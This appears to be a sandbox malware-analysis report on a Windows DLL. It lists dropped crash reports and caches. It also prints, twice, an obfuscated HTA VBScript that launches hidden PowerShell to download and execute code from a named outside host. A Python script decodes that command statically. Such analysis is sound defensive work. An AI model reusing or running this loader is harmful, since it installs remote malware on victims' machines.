        Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.3.7.6.<./.P.i.
        Process:C:\Windows\System32\WerFault.exe
        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
        Category:dropped
        Size (bytes):4872
        Entropy (8bit):4.483333446283704
        Encrypted:false
        SSDEEP:48:cvIwWl8zsoXJg771I9ViWpW8VYwYm8M4JC9ZC9xyYHFJPyq8vh9xyYAW4ptSTShf:uIjfiI7Wj7VIJDPWAW4poOhhd
        MD5:7A84BC9423FA4F7ECE6461074558CF38
        SHA1:D4D2AD5C3936D9DEE16EF371315CE662D50C884D
        SHA-256:36070425A9343B67C8D53C19807E6A7165C41815D4B50A3AD1DF8F2140F91785
        SHA-512:26FFBDF7EED5001ED6500674DA9FD0F59AD021C859B612AE6C9A0EA11BD67852179AC0893958443E8A4A4988C88A6B2775ED14C9607BDDEB7E0DA65103D2AFF1
        Malicious:false
        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="334509" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
        Process:C:\Windows\System32\WerFault.exe
        File Type:Mini DuMP crash report, 14 streams, Wed May 22 16:06:53 2024, 0x1205a4 type
        Category:dropped
        Size (bytes):56506
        Entropy (8bit):1.6764965369557032
        Encrypted:false
        SSDEEP:96:568+KCFkG2nZvM4lNPVasuurJoi7MCnLHERITC6yx1ukRa5sDcAPW9TlWInBlIBw:/V2LOMCnLkRKCf1RbWZDvBE7m
        MD5:41C50213B9FA3447A10C736368408F19
        SHA1:F87AEA54BBA5435CEB3153953C8AE22E64A6F07A
        SHA-256:949A7874D149D666EF720D9E1C75AC9A961397261EE41C5C307E44D7B0F298F4
        SHA-512:A50DA2F4B129DE64D1ECE4E18ACAD76BB3B2A168A69D1049AEA759BB292568B34807A15B2C5AF6BFC9E9E7ADC6424982A243E1C7C081BA91B2A26685F719D5B9
        Malicious:false
        Preview:MDMP..a..... .........Nf........................h................+..........T.......8...........T.......................................................................................................................eJ..............Lw......................T.............Nf.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
        Process:C:\Windows\System32\WerFault.exe
        File Type:Mini DuMP crash report, 14 streams, Wed May 22 16:06:53 2024, 0x1205a4 type
        Category:dropped
        Size (bytes):57126
        Entropy (8bit):1.6673705761018005
        Encrypted:false
        SSDEEP:96:56837FkG2nZvM4lNPVasuux8oi7MQqm71XVybYGHQwQDkTinYebsKjhaNWQQZWIu://COMQqqFybYGHnQDkTin/RhaYQKpNs
        MD5:4172F560570CAD0F598380171221D405
        SHA1:434ED3C586E05A778EC1430A86A10B8EA5BE7C66
        SHA-256:4ABD983EF7F399974D6330B9EBE1C38142506E26C0C09A9ED12CF5AC6203231C
        SHA-512:1018573FBD63143F4E740F9EA38E5EFB2EC94F60742DF393D15E3727571B8253FD17DF915DDD3B844EFA3CC0CFFEAB918840D09A8B7A4941755B2CD9969A9EE8
        Malicious:false
        Preview:MDMP..a..... .........Nf........................h................+..........T.......8...........T.......................................................................................................................eJ..............Lw......................T.......l.....Nf.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
        Process:C:\Windows\System32\WerFault.exe
        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
        Category:dropped
        Size (bytes):8852
        Entropy (8bit):3.6990440053750167
        Encrypted:false
        SSDEEP:192:R6l7wVeJ3G00xq6Yuqhwd13gmfrSQpr+89bkLbf0Mm:R6lXJWm6YTWd13gmfrSSknfW
        MD5:20B828570DD634ECF75A794B9D19BBE0
        SHA1:DB1B58BFEFB901F9AC002F523E05564963499C4F
        SHA-256:5E8B07DB2EABEB49F552F7ADB0F368F26C2C2DD2FCD2E8981BBE612EDEFABA02
        SHA-512:92594BDE75EA52A6A6045CA6B33D918688AAE316AEFAFDEA2A0CC7A4A275E83833E00395A55A80AE2E0AF964979AB198E5969A99E6189585E28A99D8291BD788
        Malicious:false
        Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.6.6.8.<./.P.i.
        Process:C:\Windows\System32\WerFault.exe
        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
        Category:dropped
        Size (bytes):8844
        Entropy (8bit):3.699082292189259
        Encrypted:false
        SSDEEP:192:R6l7wVeJUMknDNb6YRzNgmfrSQprP89bkybfWMm:R6lXJE96YFNgmfrSVkmf0
        MD5:DF106679817E4355D30E8B8987CC6F8B
        SHA1:4A9F7C754925C801C7808EA4EDFC225F102D7242
        SHA-256:A4C883F3CAF7CA0BEBDA935BB1D2869AA6F0BA1D13AD0E38933D996C9D856CE5
        SHA-512:A067D9CD244F8ADFCFBC40BCA894316C1627E25225BCF2EB10DFBF394FB668EA93BD37F6518BD3547CF80769590FC087C65AA3B053B66711CF8BC741378CED26
        Malicious:false
        Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.5.0.4.<./.P.i.
        Process:C:\Windows\System32\WerFault.exe
        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
        Category:dropped
        Size (bytes):4873
        Entropy (8bit):4.482497460548716
        Encrypted:false
        SSDEEP:48:cvIwWl8zsoXJg771I9ViWpW8VYnPYm8M4JC9ZC9xyYHFVoyq8vh9xyYG7ptSTSXd:uIjfiI7Wj7V/JUWG7poOXd
        MD5:1597244FF816D285CD9106E3F8F5596B
        SHA1:B84CA7258E5CB5AA8359D38A48228ED13742FBDB
        SHA-256:54CE3D10B5127341B162EAEC7CE9DEB9595D0CF6F940F38F11BAB3D1642733F9
        SHA-512:ACAD4FCFFDCBC3EE215592B18BDF41145B411F877FE6628909E5EDB0EAD74813D0ED2DAD22E8BCE0455248B7B8BDBBD0F57C7DD3156F94E7BE37FCB35D9E58D3
        Malicious:false
        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="334509" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
        Process:C:\Windows\System32\WerFault.exe
        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
        Category:dropped
        Size (bytes):4873
        Entropy (8bit):4.48401801564365
        Encrypted:false
        SSDEEP:48:cvIwWl8zsoXJg771I9ViWpW8VY+Ym8M4JC9ZC9xyYHFIB6yq8vh9xyYdNptSTSad:uIjfiI7Wj7V6JWB6WPpoOad
        MD5:2EA9F9592F91F9242DE9D82F4C4FF1D3
        SHA1:68A8B7C0D99B5D43BFE8B71631FEF2D75966CDD9
        SHA-256:8BF645724D2FA816ADA516591AEA0C04387929DD64BD7BAC4A1366D652B367D4
        SHA-512:21F2A26CEAA7FA7586AD3C45D14A908206D812F36ABD3A2B8C0B6E86C4D20D0F8D869C8181B1F095775448D73416B3AA076E5E5E5B266B53A54672F770436C77
        Malicious:false
        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="334509" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
        Process:C:\Windows\System32\rundll32.exe
        File Type:HTML document, ASCII text, with CRLF line terminators
        Category:dropped
        Size (bytes):2331
        Entropy (8bit):2.2639624275996346
        Encrypted:false
        SSDEEP:24:1Ax2kGtrIVP5Db8mF7QdVTMs4CV4no3h25B:1uqlyFaTHukh25B
        MD5:F754844CFB65838D1DD6B19DDE5D835C
        SHA1:B3EB677783ADC88C8D048898449E04D49F416DB6
        SHA-256:3644B387519F3509A1CE3D2201E2E1E8AF36217138CC6F9E62D6E37C887097A6
        SHA-512:F42F89562B5C0BE86DBD04683EE6C30711155ACD1239E273DA726C2BFEDF5D0806C479B7107792C136BFF6E97EFB8D9145DF0C176F499F86F1B7E304A2E3CCDF
        Malicious:false
        Preview:<head>..................................... <HTA:APPLICATION icon="#" WINDOWSTATE="minimize" SHOWINTASKBAR="no" SYSMENU="no" CAPTION="no" /> .. <script type="text/vbscript"> .. Sub Window_OnLoad ....uzctjeus = replace("-CFeoFemFemFeaFenFedFe IFenFevFeoFekFee-EFexpFereFessFeiFeoFenFe Fe(iFerm -UrFei 'iapartmentlistings.com/tykhwuxk')","Fe","") ..hqsumejb = replace("FeSFehFeeFelFelFe.FeAFepFepFelFeiFecFeaFetFeiFeoFenFe","Fe","") ..foucukcj = replace("FepFeoFewFeeFerFesFehFeeFelFel","Fe","") ..CreateObject(hqsumejb).ShellExecute foucukcj, uzctjeus ,"","",0
        Process:C:\Windows\System32\rundll32.exe
        File Type:HTML document, ASCII text, with CRLF line terminators
        Category:dropped
        Size (bytes):2331
        Entropy (8bit):2.2639624275996346
        Encrypted:false
        SSDEEP:24:1Ax2kGtrIVP5Db8mF7QdVTMs4CV4no3h25B:1uqlyFaTHukh25B
        MD5:F754844CFB65838D1DD6B19DDE5D835C
        SHA1:B3EB677783ADC88C8D048898449E04D49F416DB6
        SHA-256:3644B387519F3509A1CE3D2201E2E1E8AF36217138CC6F9E62D6E37C887097A6
        SHA-512:F42F89562B5C0BE86DBD04683EE6C30711155ACD1239E273DA726C2BFEDF5D0806C479B7107792C136BFF6E97EFB8D9145DF0C176F499F86F1B7E304A2E3CCDF
        Malicious:false
        Preview:<head>..................................... <HTA:APPLICATION icon="#" WINDOWSTATE="minimize" SHOWINTASKBAR="no" SYSMENU="no" CAPTION="no" /> .. <script type="text/vbscript"> .. Sub Window_OnLoad ....uzctjeus = replace("-CFeoFemFemFeaFenFedFe IFenFevFeoFekFee-EFexpFereFessFeiFeoFenFe Fe(iFerm -UrFei 'iapartmentlistings.com/tykhwuxk')","Fe","") ..hqsumejb = replace("FeSFehFeeFelFelFe.FeAFepFepFelFeiFecFeaFetFeiFeoFenFe","Fe","") ..foucukcj = replace("FepFeoFewFeeFerFesFehFeeFelFel","Fe","") ..CreateObject(hqsumejb).ShellExecute foucukcj, uzctjeus ,"","",0
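The two HTA records above are the file that rundll32.exe wrote after fetching d.txt from www.siguefutbol.com (see the HTTPS session later in this report). Every string in it is built at run time by stripping the junk token "Fe" from a padded literal with VBScript's Replace(), so the decoded command never appears in the file. The script below is an added example and is not part of the Joe Sandbox report or of the sample: it takes the VBScript body from the preview (embedded as a constructed sample), evaluates each Replace(literal, token, "") assignment statically, resolves the three variables handed to ShellExecute, and pulls the URL out of the result. It assumes, as holds for this file, that each ShellExecute argument is a plain variable assigned from a single Replace() call; the helper names are the example's own.

```python
import re

# Constructed sample: the VBScript body from the HTA record above, with the
# line breaks the preview shows as ".." restored. Nothing else is added.
HTA_VBSCRIPT = r'''Sub Window_OnLoad
uzctjeus = replace("-CFeoFemFemFeaFenFedFe IFenFevFeoFekFee-EFexpFereFessFeiFeoFenFe Fe(iFerm -UrFei 'iapartmentlistings.com/tykhwuxk')","Fe","")
hqsumejb = replace("FeSFehFeeFelFelFe.FeAFepFepFelFeiFecFeaFetFeiFeoFenFe","Fe","")
foucukcj = replace("FepFeoFewFeeFerFesFehFeeFelFel","Fe","")
CreateObject(hqsumejb).ShellExecute foucukcj, uzctjeus ,"","",0
'''

# var = replace("<padded literal>", "<junk token>", "")   (VBScript is case-insensitive)
REPLACE_ASSIGN = re.compile(
    r'^\s*(\w+)\s*=\s*replace\(\s*"([^"]*)"\s*,\s*"([^"]*)"\s*,\s*""\s*\)\s*$',
    re.IGNORECASE | re.MULTILINE)
# CreateObject(<objvar>).ShellExecute <filevar>, <argsvar>, ...
SHELL_EXECUTE = re.compile(
    r'CreateObject\(\s*(\w+)\s*\)\.ShellExecute\s+(\w+)\s*,\s*(\w+)',
    re.IGNORECASE)


def resolve_replace_vars(script: str) -> dict:
    """Statically evaluate every  x = replace("...", "tok", "")  assignment."""
    resolved = {}
    for name, padded, token in REPLACE_ASSIGN.findall(script):
        # VBScript Replace() scans left to right without rescanning its own
        # output, which is exactly what str.replace() does.
        resolved[name] = padded.replace(token, "")
    return resolved


def recover_shellexecute(script: str) -> dict:
    """Resolve the COM object, program and argument string passed to ShellExecute."""
    variables = resolve_replace_vars(script)
    match = SHELL_EXECUTE.search(script)
    if match is None:
        raise ValueError("no CreateObject(...).ShellExecute call found")
    obj_var, file_var, args_var = match.groups()
    try:
        return {"com_object": variables[obj_var],
                "program": variables[file_var],
                "arguments": variables[args_var]}
    except KeyError as missing:
        # The argument is not a plain Replace()-assigned variable; the pattern
        # would need extending (string concatenation, Chr() calls, ...).
        raise ValueError(f"unresolved variable {missing}") from None


def extract_urls(text: str) -> list:
    """Pull http(s) or scheme-less host/path references out of a decoded command."""
    return re.findall(r"(?:https?://)?[\w.-]+\.[a-z]{2,}/[\w./-]*", text, re.IGNORECASE)


if __name__ == "__main__":
    decoded = recover_shellexecute(HTA_VBSCRIPT)
    for key, value in decoded.items():
        print(f"{key:11s} {value}")
    print("urls        ", extract_urls(decoded["arguments"]))
```

Run against the sample, the three variables resolve to Shell.Application, powershell and -Command Invoke-Expression (irm -Uri 'iapartmentlistings.com/tykhwuxk'); the trailing 0 in the ShellExecute call is nShowCmd, so the PowerShell window is hidden. That command line is what produced the four plaintext GET /tykhwuxk requests from powershell.exe recorded in the HTTP sessions of this report. The analysis is purely static; neither the HTA nor the recovered command is executed.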
        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        File Type:data
        Category:dropped
        Size (bytes):5829
        Entropy (8bit):4.901113710259376
        Encrypted:false
        SSDEEP:96:ZCJ2Woe5H2k6Lm5emmXIGLgyg12jDs+un/iQLEYFjDaeWJ6KGcmXlQ9smpFRLcUn:Uxoe5HVsm5emdQgkjDt4iWN3yBGHVQ9v
        MD5:7827E04B3ECD71FB3BD7BEEE4CA52CE8
        SHA1:22813AF893013D1CCCACC305523301BB90FF88D9
        SHA-256:5D66D4CA13B4AF3B23357EB9BC21694E7EED4485EA8D2B8C653BEF3A8E5D0601
        SHA-512:D5F6604E49B7B31C2D1DA5E59B676C0E0F37710F4867F232DF0AA9A1EE170B399472CA1DF0BD21DF702A1B5005921D35A8E6858432B00619E65D0648C74C096B
        Malicious:false
        Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        File Type:data
        Category:dropped
        Size (bytes):64
        Entropy (8bit):1.1510207563435464
        Encrypted:false
        SSDEEP:3:Nlllul9kLZ:NllUG
        MD5:087D847469EB88D02E57100D76A2E8E4
        SHA1:A2B15CEC90C75870FDAE3FEFD9878DD172319474
        SHA-256:81EB9A97215EB41752F6F4189343E81A0D5D7332E1646A24750D2E08B4CAE013
        SHA-512:4682F4457C1136F84C10ACFE3BD114ACF3CCDECC1BDECC340A5A36624D93A4CB3D262B3A6DD3523C31E57C969F04903AB86BE3A2C6B07193BF08C00962B33727
        Malicious:false
        Preview:@...e.................................,..............@..........
        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        File Type:ASCII text, with no line terminators
        Category:dropped
        Size (bytes):60
        Entropy (8bit):4.038920595031593
        Encrypted:false
        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
        MD5:D17FE0A3F47BE24A6453E9EF58C94641
        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
        Malicious:false
        Preview:# PowerShell test file to determine AppLocker lockdown mode
        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        File Type:ASCII text, with no line terminators
        Category:dropped
        Size (bytes):60
        Entropy (8bit):4.038920595031593
        Encrypted:false
        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
        MD5:D17FE0A3F47BE24A6453E9EF58C94641
        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
        Malicious:false
        Preview:# PowerShell test file to determine AppLocker lockdown mode
        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        File Type:ASCII text, with no line terminators
        Category:dropped
        Size (bytes):60
        Entropy (8bit):4.038920595031593
        Encrypted:false
        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
        MD5:D17FE0A3F47BE24A6453E9EF58C94641
        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
        Malicious:false
        Preview:# PowerShell test file to determine AppLocker lockdown mode
        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        File Type:ASCII text, with no line terminators
        Category:dropped
        Size (bytes):60
        Entropy (8bit):4.038920595031593
        Encrypted:false
        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
        MD5:D17FE0A3F47BE24A6453E9EF58C94641
        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
        Malicious:false
        Preview:# PowerShell test file to determine AppLocker lockdown mode
        Process:C:\Windows\System32\WerFault.exe
        File Type:MS Windows registry file, NT/2000 or above
        Category:dropped
        Size (bytes):1835008
        Entropy (8bit):4.422408137322667
        Encrypted:false
        SSDEEP:6144:DSvfpi6ceLP/9skLmb0OTMWSPHaJG8nAgeMZMMhA2fX4WABlEnNa0uhiTw:OvloTMW+EZMM6DFy003w
        MD5:C42F6E4AA72144DBCF915327F9054505
        SHA1:0FC47DE3FE3BA4115760A6303B3CAF6BB2D5EFBD
        SHA-256:CF7C000A0A82353A625415FD0DF2D81200DF2B6425D93BE09044592E6E73D1C5
        SHA-512:DFAD821852176182DF0933D229D20FE98E28FD51F372CECB3284ED0F7C4F1B1261615F180A19AAAFA64E966A4E7AE777C54AD14B7D0DB0A9AC215426753014F6
        Malicious:false
        Preview:regf>...>....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm...b.................................................................................................................................................................................................................................................................................................................................................;........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
        File type:PE32+ executable (DLL) (GUI) x86-64 (stripped to external PDB), for MS Windows
        Entropy (8bit):4.2881181598635445
        TrID:
        • Win64 Dynamic Link Library (generic) (102004/3) 86.43%
        • Win64 Executable (generic) (12005/4) 10.17%
        • Generic Win/DOS Executable (2004/3) 1.70%
        • DOS Executable Generic (2002/1) 1.70%
        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.01%
        File name:UPazTgVGA7.dll
        File size:12'288 bytes
        MD5:e3493cc788d91b70277729ea748cce0d
        SHA1:f1246730dafb3bf93f98d5b08baa5315626fb28a
        SHA256:08a15e5718a53a317604d19b4ea49f1844d7a53af353808e7bfb9dc81cfe2342
        SHA512:b3d8b2df1b2976e0564490a65d444ede91654959af0ac7ed3f175cda9a70aa16497b9fb1b16923449c65c6e521cf93e4e99f77a66ee30e9ee7e45594b9bb1ac5
        SSDEEP:192:iL29RBzDzeobchBj8JON1ONerumrEPEjr7Ah6:829jnbcvYJOW4umvr7C6
        TLSH:AB42B50EB77354B9C816D174C1EB9771F2B3B42116228B2D07B0C6372FB2A79662ED09
        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....Mf..........."...$.....,......P.....................................................`... ............................
        Icon Hash:7ae282899bbab082
        Entrypoint:0x2b1b81350
        Entrypoint Section:.text
        Digitally signed:false
        Imagebase:0x2b1b80000
        Subsystem:windows gui
        Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, DEBUG_STRIPPED, DLL
        DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
        Time Stamp:0x664DF29F [Wed May 22 13:26:55 2024 UTC]
TLS Callbacks:0x2b1b81510, 0x2b1b814e0
        CLR (.Net) Version:
        OS Version Major:4
        OS Version Minor:0
        File Version Major:4
        File Version Minor:0
        Subsystem Version Major:4
        Subsystem Version Minor:0
        Import Hash:b96aec3ffae7ee03e83bfcd97f055c55
Instruction (x86-64 decoding; REX-prefixed instructions shown with their 64-bit operands)
mov rax, qword ptr [rip+00002FE9h]
mov dword ptr [rax], 00000000h
jmp 00007F65111EFED3h
nop word ptr [rax+rax+00000000h]
nop dword ptr [rax]
mov rdx, rcx
lea rcx, qword ptr [rip+00005C86h]
jmp 00007F65111F0E06h
nop
lea rcx, qword ptr [rip+00000009h]
jmp 00007F65111F0019h
nop dword ptr [rax+00h]
ret
nop
nop
nop
nop
nop
nop
nop
